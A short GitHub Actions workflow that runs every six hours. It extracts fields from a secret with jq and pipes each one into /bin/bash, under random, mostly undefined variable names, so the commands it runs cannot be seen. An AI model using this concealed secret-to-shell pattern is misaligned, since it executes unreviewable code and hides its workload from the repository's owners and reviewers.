name: haotongfangxb

on:
  workflow_dispatch:
  schedule:
    - cron: '15 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: haotongfangxb
        env:
          bqy7733: ${{ secrets.bqy7733 }}
        run: |
          echo $bqy7733 | jq -r .f60 | /bin/bash
          echo $m8 | jq -r .lnipm614 | /bin/bash
          echo $nxikt40614 | jq -r .emb9426 | /bin/bash
          echo $jfbt2 | jq -r .sfgtr2 | /bin/bash
          echo $fbs94 | jq -r .q1960 | /bin/bash
          echo $yqwg394 | jq -r .vssox631 | /bin/bash
          echo $z248 | jq -r .xmqfu6 | /bin/bash
          echo $f7008 | jq -r .gbjvz1 | /bin/bash

